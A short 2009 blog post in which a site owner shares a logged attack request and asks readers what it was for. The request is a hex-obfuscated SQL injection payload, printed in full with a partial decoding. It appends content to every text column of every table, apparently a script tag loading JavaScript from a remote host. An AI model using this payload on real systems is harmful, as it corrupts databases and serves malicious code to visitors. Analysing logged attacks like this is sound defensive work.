Another Bad Person Looking for Trouble?
Posted by Dave at 11/4/2009 3:53:29 PM
No users have rated this item yet.
I found an odd looking request in my log files:
"/default.asp?guid=road_to_the_derby200303110002; declare%20@s%20varchar(4000);set%20@s=cast(0x4465434c 417265204054207641726368415228323535292c4063205641 52436861522832353529204445634c415245207461426c655f 637552736f7220635552734f5220466f722073654c65637420 412e4e414d652c622e4e614d452066724f6d207379736f624a 4543747320612c735973634f6c756d4e732062207768455265 20412e69643d422e496420616e4420412e58747950653d2755 2720616e642028622e78745970453d3939206f5220622e7854 5970653d3335204f7220622e78745970653d323331204f5220 422e78547950653d31363729204f70654e205441424c455f43 7572736f52204665546368204e4578542046524f6d20744162 6c655f435572736f7220494e546f2040542c4063207748496c 6528404046457443485f7354615455733d302920624567696e 20657845632827557064617445205b272b40742b275d205365 54205b272b40432b275d3d727472494d28436f4e7645725428 766152436841522834303030292c5b272b40432b275d29292b 63617354283078334337333633373236393730373432303733 37323633334436383734373437303341324632463737373737 37324536393645363436353738364137333245373237353246 37303631363736353245364137333345334332463733363337 32363937303734334520415320764152436861722835322929 2729206645746368204e4578742066726f4d205441626c655f 635552736f7220696e744f2040742c404320654e6420434c6f 5345205461624c655f437552734f72204445614c6c6f436174 65207441626c655f435572736f7220%20as%20varchar(4000 ));exec(@s);--
The seemingly meaningless numbers are Hexidecimal code. Using http://www.string-functions.com/hex-string.aspx, I converted the Hex code into this string:
/default.asp?guid=road_to_the_derby200303110002;dec lare%20@s%20varchar(4000);set%20@s= DeCLAre @T vArchAR(255),@c VARChaR(255) DEcLARE taBle_cuRsor cURsOR For seLect A.NAMe,b.NaME frOm sysobJECts a,sYscOlumNs b whERe A.id=B.Id anD A.XtyPe='U' and (b.xtYpE=99 oR b.xTYpe=35 Or b.xtYpe=231 OR B.xTyPe=167) OpeN TABLE_CursoR FeTch NExT FROm tAble_CUrsor INTo @T,@c wHIle(@@FEtCH_sTaTUs=0) bEgin exEc('UpdatE ['+@t+'] SeT ['+@C+']=rtrIM(CoNvErT(vaRChAR(4000),['+@C+']))+ ‘’ ') fEtch NExt froM TAble_cURsor intO @t,@C eNd CLoSE TabLe_CuRsOr DEaLloCate tAble_CUrsor %20as%20varchar(4000));exec(@s);--
It looks like they were poking around for a SQLServer instance on the box and trying to make it run a .js page (currently removed from www.indexjs.ru). What do you think they were up to? Wonder what would have happened if my web server did have a SQLServer instance running on the same machine (which I don't think it does) and if that .js page had run?
6,353 views.
No users have rated this item yet.